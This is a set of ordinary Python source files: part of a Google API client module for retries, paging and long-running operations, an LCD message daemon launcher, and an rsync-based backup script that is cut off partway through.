particular call.
"""
# pylint: disable=too-few-public-methods
def __init__(self, timeout=OPTION_INHERIT, retry=OPTION_INHERIT,
page_token=OPTION_INHERIT, is_bundling=False, **kwargs):
"""Constructor.
Example:
>>> # change an api call's timeout
>>> o1 = CallOptions(timeout=30) # make the timeout 30 seconds
>>>
>>> # set page streaming to be per-page on a call where it is
>>> # normally per-resource
>>> o2 = CallOptions(page_token=INITIAL_PAGE)
>>>
>>> # disable retrying on an api call that normally retries
>>> o3 = CallOptions(retry=None)
>>>
>>> # enable bundling on a call that supports it
>>> o4 = CallOptions(is_bundling=True)
Args:
timeout (int): The client-side timeout for non-retrying API calls.
retry (:class:`RetryOptions`): determines whether and how to retry
on transient errors. When set to None, the call will not retry.
page_token (str): If set and the call is configured for page
streaming, page streaming is performed per-page, starting with
this page_token. Use ``INITIAL_PAGE`` for the first request.
If unset and the call is configured for page streaming, page
streaming is performed per-resource.
is_bundling (bool): If set and the call is configured for bundling,
bundling is performed. Bundling is always disabled by default.
"""
if not (timeout == OPTION_INHERIT or retry == OPTION_INHERIT):
raise ValueError('The CallOptions has incompatible settings: '
'"timeout" cannot be specified on a retrying call')
self.timeout = timeout
self.retry = retry
self.page_token = page_token
self.is_bundling = is_bundling
self.kwargs = kwargs or OPTION_INHERIT
class PageDescriptor(
collections.namedtuple(
'PageDescriptor',
['request_page_token_field',
'response_page_token_field',
'resource_field'])):
"""Describes the structure of a page-streaming call."""
pass
class RetryOptions(
collections.namedtuple(
'RetryOptions',
['retry_codes',
'backoff_settings'])):
"""Per-call configurable settings for retrying upon transient failure.
Attributes:
retry_codes (list[string]): a list of Google API canonical error codes
upon which a retry should be attempted.
backoff_settings (:class:`BackoffSettings`): configures the retry
exponential backoff algorithm.
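    Example:
      A minimal, illustrative sketch; ``backoff`` stands in for a
      :class:`BackoffSettings` instance built elsewhere:
      >>> retry = RetryOptions(['UNAVAILABLE', 'DEADLINE_EXCEEDED'], backoff)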
"""
pass
class BackoffSettings(
collections.namedtuple(
'BackoffSettings',
['initial_retry_delay_millis',
'retry_delay_multiplier',
'max_retry_delay_millis',
'initial_rpc_timeout_millis',
'rpc_timeout_multiplier',
'max_rpc_timeout_millis',
'total_timeout_millis'])):
"""Parameters to the exponential backoff algorithm for retrying.
Attributes:
initial_retry_delay_millis: the initial delay time, in milliseconds,
between the completion of the first failed request and the initiation of
the first retrying request.
retry_delay_multiplier: the multiplier by which to increase the delay time
between the completion of failed requests, and the initiation of the
subsequent retrying request.
max_retry_delay_millis: the maximum delay time, in milliseconds, between
requests. When this value is reached, ``retry_delay_multiplier`` will no
longer be used to increase delay time.
initial_rpc_timeout_millis: the initial timeout parameter to the request.
rpc_timeout_multiplier: the multiplier by which to increase the timeout
parameter between failed requests.
max_rpc_timeout_millis: the maximum timeout parameter, in milliseconds,
for a request. When this value is reached, ``rpc_timeout_multiplier``
will no longer be used to increase the timeout.
total_timeout_millis: the total time, in milliseconds, starting from when
the initial request is sent, after which an error will be returned,
regardless of the retrying attempts made meanwhile.
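    Example:
      A minimal, illustrative construction; the values below are placeholders,
      not recommended defaults:
      >>> backoff = BackoffSettings(
      ...     initial_retry_delay_millis=100,
      ...     retry_delay_multiplier=1.3,
      ...     max_retry_delay_millis=10000,
      ...     initial_rpc_timeout_millis=3000,
      ...     rpc_timeout_multiplier=1.0,
      ...     max_rpc_timeout_millis=10000,
      ...     total_timeout_millis=30000)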
"""
pass
class BundleDescriptor(
collections.namedtuple(
'BundleDescriptor',
['bundled_field',
'request_discriminator_fields',
'subresponse_field'])):
"""Describes the structure of bundled call.
request_discriminator_fields may include '.' as a separator, which is used
to indicate object traversal. This allows fields in nested objects to be
used to determine what requests to bundle.
Attributes:
bundled_field: the repeated field in the request message that
will have its elements aggregated by bundling
request_discriminator_fields: a list of fields in the
target request message class that are used to determine
which messages should be bundled together.
subresponse_field: an optional field, when present it indicates the field
in the response message that should be used to demultiplex the response
into multiple response messages.
"""
def __new__(cls,
bundled_field,
request_discriminator_fields,
subresponse_field=None):
return super(cls, BundleDescriptor).__new__(
cls,
bundled_field,
request_discriminator_fields,
subresponse_field)
class BundleOptions(
collections.namedtuple(
'BundleOptions',
['element_count_threshold',
'element_count_limit',
'request_byte_threshold',
'request_byte_limit',
'delay_threshold'])):
"""Holds values used to configure bundling.
The xxx_threshold attributes are used to configure when the bundled request
should be made.
Attributes:
element_count_threshold: the bundled request will be sent once the
count of outstanding elements in the repeated field reaches this
value.
element_count_limit: represents a hard limit on the number of elements
in the repeated field of the bundle; if adding a request to a bundle
would exceed this value, the bundle is sent and the new request is
added to a fresh bundle. It is invalid for a single request to exceed
this limit.
request_byte_threshold: the bundled request will be sent once the count
of bytes in the request reaches this value. Note that this value is
pessimistically approximated by summing the bytesizes of the elements
in the repeated field, and therefore may be an under-approximation.
request_byte_limit: represents a hard limit on the size of the bundled
request; if adding a request to a bundle would exceed this value, the
bundle is sent and the new request is added to a fresh bundle. It is
invalid for a single request to exceed this limit. Note that this
value is pessimistically approximated by summing the bytesizes of the
        elements in the repeated field, with a buffer applied to compensate for
        the resulting under-approximation.
delay_threshold: the bundled request will be sent this amount of
time after the first element in the bundle was added to it.
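    Example:
      A minimal, illustrative sketch; at least one threshold must be a
      positive integer:
      >>> options = BundleOptions(element_count_threshold=25)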
"""
# pylint: disable=too-few-public-methods
def __new__(cls,
element_count_threshold=0,
element_count_limit=0,
request_byte_threshold=0,
request_byte_limit=0,
delay_threshold=0):
"""Invokes the base constructor with default values.
The default values are zero for all attributes and it's necessary to
specify at least one valid threshold value during construction.
Args:
element_count_threshold: the bundled request will be sent once the
count of outstanding elements in the repeated field reaches this
value.
element_count_limit: represents a hard limit on the number of
elements in the repeated field of the bundle; if adding a request
to a bundle would exceed this value, the bundle is sent and the new
request is added to a fresh bundle. It is invalid for a single
request to exceed this limit.
request_byte_threshold: the bundled request will be sent once the
count of bytes in the request reaches this value. Note that this
value is pessimistically approximated by summing the bytesizes of
the elements in the repeated field, with a buffer applied to
compensate for the corresponding under-approximation.
request_byte_limit: represents a hard limit on the size of the
bundled request; if adding a request to a bundle would exceed this
value, the bundle is sent and the new request is added to a fresh
bundle. It is invalid for a single request to exceed this
limit. Note that this value is pessimistically approximated by
summing the bytesizes of the elements in the repeated field, with a
            buffer applied to compensate for the resulting under-approximation.
delay_threshold: the bundled request will be sent this amount of
time after the first element in the bundle was added to it.
"""
assert isinstance(element_count_threshold, int), 'should be an int'
assert isinstance(element_count_limit, int), 'should be an int'
assert isinstance(request_byte_threshold, int), 'should be an int'
assert isinstance(request_byte_limit, int), 'should be an int'
assert isinstance(delay_threshold, int), 'should be an int'
assert (element_count_threshold > 0 or
request_byte_threshold > 0 or
delay_threshold > 0), 'one threshold should be > 0'
return super(cls, BundleOptions).__new__(
cls,
element_count_threshold,
element_count_limit,
request_byte_threshold,
request_byte_limit,
delay_threshold)
class PageIterator(object):
"""An iterator over the pages of a page streaming API call.
Provides access to the individual pages of the call, as well as the page
token.
Attributes:
response: The full response message for the call most recently made, or
None if a call has not yet been made.
page_token: The page token to be passed in the request for the next call
to be made.
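    Example:
      A minimal, illustrative sketch; ``my_api_call``, ``descriptor`` and
      ``request`` are hypothetical stand-ins for a page-streaming call, its
      :class:`PageDescriptor` and its request message:
      >>> pages = PageIterator(my_api_call, descriptor, INITIAL_PAGE, request)
      >>> for page in pages:  # each page is the repeated resource field
      ...     for resource in page:
      ...         print(resource)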
"""
# pylint: disable=too-few-public-methods
def __init__(self, api_call, page_descriptor, page_token, request, **kwargs):
"""Constructor.
Args:
api_call (callable[[req], resp]): an API call that is page
streaming.
page_descriptor (:class:`PageDescriptor`): indicates the structure
of page streaming to be performed.
page_token (str): The page token to be passed to API call request.
If no page token has yet been acquired, this field should be set
to ``INITIAL_PAGE``.
request (object): The request to be passed to the API call. The page
token field of the request is overwritten by the ``page_token``
passed to the constructor, unless ``page_token`` is
``INITIAL_PAGE``.
**kwargs: Arbitrary keyword arguments to be passed to the API call.
Returns:
A PageIterator object.
"""
self.response = None
self.page_token = page_token or INITIAL_PAGE
self._func = api_call
self._page_descriptor = page_descriptor
self._request = request
self._kwargs = kwargs
self._done = False
def __iter__(self):
return self
def next(self):
"""For Python 2.7 compatibility; see __next__."""
return self.__next__()
def __next__(self):
"""Retrieves the next page."""
if self._done:
raise StopIteration
if self.page_token != INITIAL_PAGE:
setattr(self._request,
self._page_descriptor.request_page_token_field,
self.page_token)
response = self._func(self._request, **self._kwargs)
self.page_token = getattr(
response, self._page_descriptor.response_page_token_field)
if not self.page_token:
self._done = True
return getattr(response, self._page_descriptor.resource_field)
class ResourceIterator(object):
"""An iterator over resources of the page iterator."""
# pylint: disable=too-few-public-methods
def __init__(self, page_iterator):
"""Constructor.
Args:
page_iterator (PageIterator): the base iterator of getting pages.
"""
self._page_iterator = page_iterator
self._current = None
self._index = -1
def __iter__(self):
return self
def next(self):
"""For Python 2.7 compatibility; see __next__."""
return self.__next__()
def __next__(self):
"""Retrieves the next resource."""
# pylint: disable=next-method-called
while not self._current:
self._current = next(self._page_iterator)
self._index = 0
resource = self._current[self._index]
self._index += 1
if self._index >= len(self._current):
self._current = None
return resource
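# Illustrative sketch (not part of the original module): how PageIterator and
# ResourceIterator compose. 'list_foos', 'FOO_PAGE_DESCRIPTOR', 'request' and
# 'handle' are hypothetical placeholders, not real symbols from this library.
#
#   pages = PageIterator(list_foos, FOO_PAGE_DESCRIPTOR, INITIAL_PAGE, request)
#   for foo in ResourceIterator(pages):
#       handle(foo)   # iterates across page boundaries transparently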
def _from_any(pb_type, any_pb):
"""Converts an Any protobuf to the specified message type
Args:
pb_type (type): the type of the message that any_pb stores an instance
of.
any_pb (google.protobuf.any_pb2.Any): the object to be converted.
Returns:
An instance of the pb_type message.
"""
msg = pb_type()
# Check exceptional case: raise if can't Unpack
if not any_pb.Unpack(msg):
raise TypeError(
'Could not convert {} to {}'.format(
any_pb.__class__.__name__, pb_type.__name__))
# Return expected message
return msg
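# Minimal usage sketch for _from_any (not original code; assumes the protobuf
# well-known types are importable in this environment):
#
#   from google.protobuf import any_pb2, duration_pb2
#   any_msg = any_pb2.Any()
#   any_msg.Pack(duration_pb2.Duration(seconds=3))
#   duration = _from_any(duration_pb2.Duration, any_msg)  # Duration(seconds=3)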
def _try_callback(target, clbk):
try:
clbk(target)
except Exception as ex: # pylint: disable=broad-except
_LOG.exception(ex)
class _DeadlineExceededError(RpcError, GaxError):
def __init__(self):
super(_DeadlineExceededError, self).__init__('Deadline Exceeded')
def code(self): # pylint: disable=no-self-use
"""Always returns StatusCode.DEADLINE_EXCEEDED"""
return StatusCode.DEADLINE_EXCEEDED
class _OperationFuture(object):
"""A Future which polls a service for completion via OperationsClient."""
def __init__(self, operation, client, result_type, metadata_type,
call_options=None):
"""Constructor.
Args:
operation (google.longrunning.Operation): the initial long-running
operation object.
client (google.gapic.longrunning.operations_client.OperationsClient):
a client for the long-running operation service.
result_type (type): the class type of the result.
metadata_type (type, optional): the class type of the metadata.
call_options (google.gax.CallOptions, optional): the call options
that are used when reloading the operation.
"""
self._operation = operation
self._client = client
self._result_type = result_type
self._metadata_type = metadata_type
self._call_options = call_options
self._queue = mp.Queue()
self._process = None
def cancel(self):
"""If last Operation's value of `done` is true, returns false;
otherwise, issues OperationsClient.cancel_operation and returns true.
"""
if self.done():
return False
self._client.cancel_operation(self._operation.name)
return True
def result(self, timeout=None):
"""Enters polling loop on OperationsClient.get_operation, and once
Operation.done is true, then returns Operation.response if successful or
throws GaxError if not successful.
This method will wait up to timeout seconds. If the call hasn't
completed in timeout seconds, then a RetryError will be raised. timeout
can be an int or float. If timeout is not specified or None, there is no
limit to the wait time.
"""
# Check exceptional case: raise if no response
if not self._poll(timeout).HasField('response'):
raise GaxError(self._operation.error.message)
# Return expected result
return _from_any(self._result_type, self._operation.response)
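# Illustrative sketch (not original code): typical use of the future returned by a
# long-running call. 'start_long_running_op' is a hypothetical placeholder.
#
#   future = start_long_running_op(...)        # returns an _OperationFuture
#   try:
#       result = future.result(timeout=300)    # poll for up to ~5 minutes
#   except RetryError:
#       ...                                    # operation did not finish in time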
def exception(self, timeout=None):
"""Similar to result(), except returns the exception if any."""
# Check exceptional case: return none if no error
if not self._poll(timeout).HasField('error'):
return None
# Return expected error
return self._operation.error
def cancelled(self):
"""Return True if the call was successfully cancelled."""
self._get_operation()
return (self._operation.HasField('error') and
self._operation.error.code == code_pb2.CANCELLED)
def done(self):
"""Issues OperationsClient.get_operation and returns value of
Operation.done.
"""
return self._get_operation().done
def add_done_callback(self, fn): # pylint: disable=invalid-name
"""Enters a polling loop on OperationsClient.get_operation, and once the
operation is done or cancelled, calls the function with this
_OperationFuture. Added callables are called in the order that they were
added.
"""
if self._operation.done:
_try_callback(self, fn)
else:
self._queue.put(dill.dumps(fn))
if self._process is None:
self._process = mp.Process(target=self._execute_tasks)
self._process.start()
def operation_name(self):
"""Returns the value of Operation.name."""
return self._operation.name
def metadata(self):
"""Returns the value of Operation.metadata from the last call to
OperationsClient.get_operation (or if only the initial API call has been
made, the metadata from that first call).
"""
# Check exceptional case: return none if no metadata
if not self._operation.HasField('metadata'):
return None
# Return expected metadata
return _from_any(self._metadata_type, self._operation.metadata)
def last_operation_data(self):
"""Returns the data from the last call to OperationsClient.get_operation
(or if only the initial API call has been made, the data from that first
call).
"""
return self._operation
def _get_operation(self):
if not self._operation.done:
self._operation = self._client.get_operation(
self._operation.name, self._call_options)
return self._operation
def _poll(self, timeout=None):
def _done_check(_):
# Check exceptional case: raise if in progress
if not self.done():
raise _DeadlineExceededError()
# Return expected operation
return self._operation
if timeout is None:
backoff_settings = BackoffSettings(
1000, 2, 30000, None, None, None, None)
else:
backoff_settings = BackoffSettings(
1000, 2, 30000, 0, 0, 0, timeout * _MILLIS_PER_SEC)
retry_options = RetryOptions(
[StatusCode.DEADLINE_EXCEEDED], backoff_settings)
retryable_done_check = retryable(_done_check, retry_options)
return retryable_done_check()
def _execute_tasks(self):
self._poll()
while not self._queue.empty():
task = dill.loads(self._queue.get())
_try_callback(self, task)
|
lcddaemon.py
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" This script is the launcher of the daemon.
"""
import sys
import threading
from core.daemonargs import parse_arguments
from core.message import Message
from core.message import set_default_repeat
from core.message import set_default_ttl
from core.message import set_default_duration
from core.queue import MessageQueue
from core.queuemanager import QueueManager
from core.loader import load_module_from_conf
from core.loader import load_driver_from_conf
from core.loader import load_animation_from_conf
from server.server import run
from server.server import shutdown
driver = None
def main():
global driver
# Parse args from cmd.
config = parse_arguments()
# Set default values.
set_default_repeat(config["ttr"])
set_default_ttl(config["ttl"])
set_default_duration(config["ttd"])
# Create the message queue.
message_queue = MessageQueue(config["limit"])
# Load module, driver and animation according to args.
module_class = load_module_from_conf(config)
driver_class = load_driver_from_conf(config)
driver = driver_class()
animation_class = load_animation_from_conf(config)
animation = animation_class(driver)
# Create the message manager and start the thread.
message_manager = QueueManager(message_queue, module_class, animation)
message_manager_thread = threading.Thread(target=message_manager.manage)
message_manager_thread.daemon = True
message_manager_thread.start()
# Start the web server.
webserver_thread = threading.Thread(target=run, args=(message_queue, config["ptl"]))
webserver_thread.daemon = True
webserver_thread.start()
# Notify the user that everything is working:
# In cmd.
print("Daemon ready!")
# On the screen.
started_message = Message("Daemon ready!", "lcd_daemon", 1, 1, 5, {})
message_queue.put(started_message, verbose=False)
webserver_thread.join()
if __name__ == '__main__':
try:
main()
except Exception as e:
print("An exception occurs, here are some details:")
# Print informations about the exception.
exc_type, exc_obj, exc_tb = sys.exc_info()
file_name = exc_tb.tb_frame.f_code.co_filename
print("- Exception type: "+e.__class__.__name__)
print("- File name: "+file_name)
print("- Line no: "+str(exc_tb.tb_lineno))
finally:
# Shut down the server and notify the user.
# In cmd.
print("Shutting down...")
# On the screen.
if driver is not None: # Only do it if the screen has been used already.
driver.clear()
driver.write_lines(("Shutting down...",))
shutdown()
# Notify the user that the daemon is stopped:
# In cmd.
print("Daemon stopped!")
# On the screen.
if driver is not None: # Only do it if the screen has been used already.
driver.clear()
driver.write_lines(("Daemon stopped!",))
sys.exit(0)
|
do_backup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
A script doing periodical backup.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
from datetime import datetime, timedelta
import dateutil.relativedelta
from logging import getLogger, StreamHandler, Formatter, NullHandler
from logging import DEBUG, WARN
from logging.handlers import RotatingFileHandler
import os
import os.path
import platform
import subprocess
import shlex
import shutil
import stat
import sys
import threading
import time
import traceback
if sys.version_info[0] == 3:
unicode = str
Version = '3.7.0'
_FULL_BACKUP_INTERVAL = 30
_DEFAULT_DIR = '/mnt/disk0/backup'
_DEFAULT_DIR_FORMAT = '{hostname}-%Y%m%d'
_DEFAULT_DIR_FORMAT_HOURLY = '{hostname}-%Y%m%d-%H'
# Tries to remove backups that are older than this count (days or hours).
# This script relies on the assumption that old backups keep the
# same directory name structure specified by dir-format.
# If a user changes the directory name format,
# this script will just fail to detect/delete old backups.
_DEFAULT_REMOVAL_THRESHOLD = 31
# This script looks for old directories until this index.
_DEFAULT_REMOVAL_SEARCH_THRESHOLD = 100
_DEFAULT_INCLUDED_DIR = []
_DEFAULT_EXCLUDED_DIR = ['/dev', '/proc', '/sys', '/tmp',
'/mnt', '/media', '/root', '/run',
'/lost+found',
'/var/lock', '/var/tmp', '/var/run',
'/backup']
_null_logger = getLogger('null')
_null_logger.addHandler(NullHandler())
_null_logger.propagate = False
class AppException(Exception):
pass
def _parse_args():
parser = argparse.ArgumentParser(
description=('Do backup to (another) local disk.'))
parser.add_argument('src', metavar='SRC',
type=str,
nargs='+')
parser.add_argument('-b', '--base-dir',
action='store',
type=str,
help=('Base directory for destination under which'
' a directory for each backup will'
' be prepared.'),
default=_DEFAULT_DIR)
parser.add_argument('--dir-format',
action='store',
type=str,
help=('Directory format for each daily backup.'),
default=_DEFAULT_DIR_FORMAT)
parser.add_argument('-i', '--identity-file',
type=str,
help='Let ssh use this private key.')
parser.add_argument('-f', '--force-full-backup',
action='store_true',
help=('Do not use --link-dest even when a preceding'
' backup directory exists, possibly consuming much'
' more disk space.'))
parser.add_argument('-r', '--removal-threshold',
action='store',
type=int,
help=(('Specifies until when this script keeps'
' old backups.'
' If this value is set to {example}'
' for example, backups from {example} days ago'
' will be kept but backups before that date'
' will be removed.'
' 0 or less means no removal.')
.format(example=_DEFAULT_REMOVAL_THRESHOLD)),
default=_DEFAULT_REMOVAL_THRESHOLD)
parser.add_argument('--hourly',
action='store_true',
help=('Relevant operations will be applied'
' on an hourly basis.'))
parser.add_argument('-e', '--exclude',
action='append',
type=str,
help=('Files(dirs) that should be excluded'
' in addition to the default exclusion list.'))
parser.add_argument('--exclude-from',
action='store',
type=str,
help=("A file specifying files(dirs) to be ignored."))
parser.add_argument('--include',
action='append',
type=str,
help=('Files(dirs) that should be included'
' as backup.'
' Note --include is prioritized over'
' --exclude.'))
parser.add_argument('--log',
action='store',
type=str,
help='Log level like DEBUG/INFO/WARN',
default='INFO')
parser.add_argument('-d', '--debug', action='store_true',
help='Shortcut for --log DEBUG')
parser.add_argument('-w', '--warn', action='store_true',
help='Shortcut for --log WARN')
parser.add_argument('-l', '--log-rsync-output', action='store_true',
help='Include rsync output to DEBUG log')
parser.add_argument('--verbose-rsync', action='store_true',
help='Set --verbose option to rsync')
parser.add_argument('--verbose-log-file',
action='store',
type=str,
help=('If specified, store all DEBUG logs into'
' the file. The log file\'s log level'
' is not affected by --log or relevant'
' log-level options.'))
parser.add_argument('-t', '--src-type',
action='store',
type=str,
default='local',
help='Can specify "local", "ssh", or "rough"')
parser.add_argument('-c', '--rsync-command', default='rsync',
help='Exact command name to use')
parser.add_argument('--rsync-bwlimit', metavar='KBPS',
help='Value for rsync\'s --bwlimit option')
parser.add_argument('-v', '--version',
action='version',
version='{}'.format(Version),
help='Show version and exit')
args = parser.parse_args()
return args
def _get_backup_dir_path(thatday, base_dir, dir_format):
return os.path.join(base_dir, _get_backup_dir_name(thatday, dir_format))
def _get_backup_dir_name(thatday, dir_format):
return thatday.strftime(dir_format.format(
hostname=platform.node()))
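# Illustrative example (not original code): with the default dir_format
# '{hostname}-%Y%m%d' on a host named 'myhost', a backup taken on 2020-01-31 lands
# in '<base_dir>/myhost-20200131'; the hourly format '{hostname}-%Y%m%d-%H'
# additionally appends the hour, e.g. 'myhost-20200131-23'.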
def _is_permission_error(e):
"""\
Return True if the given exception is a permission (access) error, False otherwise.
"""
# See PEP 3151
if sys.version_info[0:2] < (3, 2):
return (isinstance(e, (OSError, IOError))
and e.args[0] == 13)
else:
return isinstance(e, PermissionError)
def _del_rw(function, path, exc_info, logger=None):
"""\
Walk the directories at or above the parent of ``path``, starting from the
root of the directory tree, and check that each of them is accessible.
Also check that the parent directory itself is writable.
This function is meant to be passed as the ``onerror`` keyword argument of
shutil.rmtree(): ``function`` is the function that raised the exception,
``path`` is the path name passed to ``function``, and
``exc_info`` is the ``(type, value, traceback)`` tuple.
To use a logger, pass something like
lambda a, b, c: _del_rw(a, b, c, logger=logger)
to rmtree()'s ``onerror``.
"""
logger = logger or _null_logger
if _is_permission_error(exc_info[1]):
logger.debug('Permission denied found (path: "{}", exc_info: {}).'
' Try fixing the permission.'
.format(path, exc_info))
# The removal fails either because some directory at or above the parent is
# not accessible, or because the parent itself is not writable.
# So, starting from the root, forcibly add the required permission bits in order.
# However, directories near the root normally belong to another user (e.g. root),
# so before setting the access bit, check that the current user actually owns
# the directory.
target_dirs_stack = []
parent_dir_path = os.path.dirname(path)
cur_path = parent_dir_path
while cur_path != '/':
target_dirs_stack.append(cur_path)
cur_path = os.path.dirname(cur_path)
while target_dirs_stack:
cur_path = target_dirs_stack.pop()
if not os.access(cur_path, os.X_OK):
logger.debug('"{}" is not accessible. Try modifying it.'
.format(cur_path))
if os.geteuid() == os.stat(cur_path).st_uid:
os.chmod(cur_path,
os.stat(cur_path).st_mode | stat.S_IXUSR)
else:
logger.error('Unable to access "{}" while the owner'
' is different from current user (euid: {})'
.format(cur_path, os.geteuid()))
raise exc_info[1]
if (cur_path == parent_dir_path
and not (os.stat(cur_path).st_mode & stat.S_IWUSR)):
logger.debug('"{}" is not writable. Try modifying it.'
.format(cur_path))
os.chmod(cur_path,
os.stat(cur_path).st_mode | stat.S_IWUSR)
function(path)
logger.debug('Successfully fixed permission problem (path: {})'
.format(path))
else:
logger.debug('Unacceptable exception (exc_info: {})'.format(exc_info))
raise exc_info[1]
def _remove_old_backups_if_exist(today, base_dir, dir_format,
first_index, last_index, hourly,
logger=None):
logger = logger or _null_logger
for i in range(first_index, last_index + 1):
if hourly:
thatday = today - timedelta(hours=i)
else:
thatday = today - timedelta(days=i)
dir_path = _get_backup_dir_path(thatday, base_dir, dir_format)
if os.path.exists(dir_path):
if not os.path.isdir(dir_path):
logger.warn('{} is not a directory. Ignoring.'
.format(dir_path))
continue
logger.info('Removing old backup "{}"'.format(dir_path))
shutil.rmtree(dir_path,
onerror=lambda a, b, c: _del_rw(a, b, c,
logger=logger))
logger.debug('Finished removing "{}"'.format(dir_path))
else:
# This would be a bit too verbose:
# logger.debug('"{}" does not exist.'.format(dir_path))
pass
def _find_link_dir(today, base_dir, dir_format,
first_index, last_index, is_hourly_backup,
logger=None):
"""\
Finds the directory that will be used with --link-dest option.
"""
logger = logger or _null_logger
for i in range(first_index, last_index + 1):
if is_hourly_backup:
thatday = today - timedelta(hours=i)
else:
thatday = today - timedelta(days=i)
dir_path = _get_backup_dir_path(thatday, base_dir, dir_format)
if os.path.isdir(dir_path):
return dir_path
return None
def _log_thread(file_in, logger, prefix):
for line in iter(file_in.readline, b''):
uni_line = unicode(line, encoding='utf-8', errors='replace')
msg = prefix + uni_line.rstrip()
logger.debug(msg)
def _construct_rsync_opts(args, link_dir_path, included_dirs, excluded_dirs,
logger=None):
logger = logger or _null_logger
if args.src_type == 'ssh':
# Note: do not rely on archive mode (-a)
rsync_opts = ['-irtlz', '--delete', '--no-specials', '--no-devices']
elif args.src_type == 'rough':
# "Rough" backup, meaning you just want to preserve file content, while
# you don't care much about permission, storage usage, etc.
rsync_opts = ['-irtL', '--no-specials', '--no-devices']
else:
rsync_opts = ['-iaAHXLu', '--delete', '--no-specials', '--no-devices']
if args.verbose_rsync:
rsync_opts.append('--verbose')
if link_dir_path:
rsync_opts.append('--link-dest={}'.format(link_dir_path))
rsync_opts.extend(map(lambda x: '--include ' + x, included_dirs))
rsync_opts.extend(map(lambda x: '--exclude ' + x, excluded_dirs))
if args.exclude_from:
rsync_opts.append(args.exclude_from)
if args.identity_file:
if not os.path.exists(args.identity_file):
err_msg = ('Identity file "{}" does not exist.'
.format(args.identity_file))
raise AppException(err_msg)
rsync_opts.append('-e "ssh -i {}"'.format(args.identity_file))
if args.rsync_bwlimit:
rsync_opts.append('--bwlimit "{}"'.format(args.rsync_bwlimit))
return rsync_opts
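# Illustrative example (not original code): for the default 'local' src type with a
# preceding backup found, the command assembled by _do_actual_backup below looks
# roughly like (hostname, dates and sources are made up):
#
#   rsync -iaAHXLu --delete --no-specials --no-devices \
#       --link-dest=/mnt/disk0/backup/myhost-20200130 \
#       --exclude /dev --exclude /proc ... \
#       /home /etc /mnt/disk0/backup/myhost-20200131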
def _do_actual_backup(src_list, dest_dir_path, link_dir_path,
included_dirs, excluded_dirs, logger, args):
'''
Returns exit status code of rsync command.
'''
cmd_base = args.rsync_command
rsync_opts = _construct_rsync_opts(args, link_dir_path,
included_dirs, excluded_dirs,
logger=logger)
cmd = '{} {} {} {}'.format(cmd_base, ' '.join(rsync_opts),
' '.join(src_list), dest_dir_path)
logger.debug('Running: {}'.format(cmd))
if args.log_rsync_output:
t_logger = logger
else:
t_logger = _null_logger
exec_args = shlex.split(cmd)
stdout_thread = None
stderr_thread = None
try:
# Start executing rsync and track its output asynchronously.
# Two separate threads will do that job.
p = subprocess.Popen(exec_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_args = (p.stdout, t_logger, '{}(stdout): '.format(exec_args[0]))
stderr_args = (p.stderr, t_logger, '{}(stderr): '.format(exec_args[0]))
stdout_thread = threading.Thread(target=_log_thread, args=stdout_args)
stderr_thread = threading.Thread(target=_log_thread, args=stderr_args)
stdout_thread.start()
stderr_thread.start()
p.wait()
# Note: rsync itself mostly exits with a non-0 status code,
# so the caller won't need to check this code anyway.
return p.returncode
finally:
logger.debug('Waiting for threads to exit.')
if stdout_thread:
stdout_thread.join()
if stderr_thread:
stderr_thread.join()
logger.debug('Confirmed threads exited.')
def _main_inter(args, logger):
if args.hourly:
if args.dir_format == _DEFAULT_DIR_FORMAT:
logger.debug('Automatically switch to "hourly" dir_format ("{}")'
.format(_DEFAULT_DIR_FORMAT_HOURLY))
args.dir_format = _DEFAULT_DIR_FORMAT_HOURLY
else:
# If the user changes the format, check if the new version
# contains "%H"
if '%H' not in args.dir_format:
logger.warn('dir_format does not contain %H while --hourly'
' option is specified')
org_base_dir = args.base_dir
norm_base_dir = os.path.normpath(args.base_dir)
logger.debug('Normalized base_dir: "{}"'.format(norm_base_dir))
if args.base_dir == "/":
logger.error("base-dir looks root to me ({})"
.format(args.base_dir))
return False
if os.path.exists(norm_base_dir):
# If base_dir exists, check if it is a writable directory.
if not os.path.isdir(norm_base_dir):
logger.error('Path "{}" is not a directory'
.format(org_base_dir))
return False
if not os.access(norm_base_dir, os.W_OK):
logger.error('Directory "{}" is not writable'
.format(org_base_dir))
return False
logger.debug('Directory "{}" exists and is writable.'
.format(org_base_dir))
else:
logger.info('Directory "{}" does not exist. Creating it.'
.format(org_base_dir))
# If base_dir does not exist, check the parent dir.
# If parent's dir exists, try creating base_dir.
parent_dir = os.path.dirname(norm_base_dir)
if (not os.path.exists(parent_dir)
or not os.path.isdir(parent_dir)):
logger.error('Parent dir "{}" is not accessible'
.format(parent_dir))
return False
os.mkdir(args.base_dir)
if args.base_dir == "/":
logger.error("base-dir looks root to me ({})".format(args.base_dir))
return False
today = datetime.today()
src_str = ', '.join(map(lambda x: '"{}"'.format(x), args.src))
dest_dir_path = _get_backup_dir_path(today, args.base_dir, args.dir_format)
logger.debug('Backup {} to "{}"'.format(src_str, dest_dir_path))
if args.removal_threshold > 0:
logger.debug('Remove old backups if exist (threshold: {})'
.format(args.removal_threshold))
first_index = args.removal_threshold + 1
last_index = _DEFAULT_REMOVAL_SEARCH_THRESHOLD
_remove_old_backups_if_exist(today, args.base_dir, args.dir_format,
first_index, last_index,
args.hourly, logger=logger)
link_dir_path = None
if args.force_full_backup:
logger.debug('Force full-backup')
else:
link_dir_path = _find_link_dir(today, args.base_dir, args.dir_format,
1, args.removal_threshold, args.hourly,
logger=logger)
if link_dir_path:
logger.debug('Will hardlink to "{}" with --link-dest'
.format(link_dir_path))
else:
logger.debug('Did not find a preceding backup.'
' Will do a full backup')
included_dirs = _DEFAULT_INCLUDED_DIR
if args.include:
included_dirs.extend(args.include)
excluded_dirs = _DEFAULT_EXCLUDED_DIR
if args.exclude:
excluded_dirs.extend(args.exclude)
logger.debug('included files: {}'.format(', '.join(included_dirs)))
logger.debug('excluded files: {}'.format(', '.join(excluded_dirs)))
exit_code = _do_actual_backup(args.src, dest_dir_path, link_dir_path,
included_dirs, excluded_dirs, logger, args)
# In most cases, "exit_code" will not be 0 (Success), since rsync reports
# failure when even a single file copy fails.
# Here, we want to know if the rsync connection is established
# (i.e. if the target server is alive).
# Ok values (see also rsync(1))
# 0 ... Success
# 23 ... Partial transfer due to error
if exit_code not in [0, 23]:
logger.error('Exit code of rsync is not acceptable (code: {})'
.format(exit_code))
return False
return True
def _get_human_readable_time(elapsed):
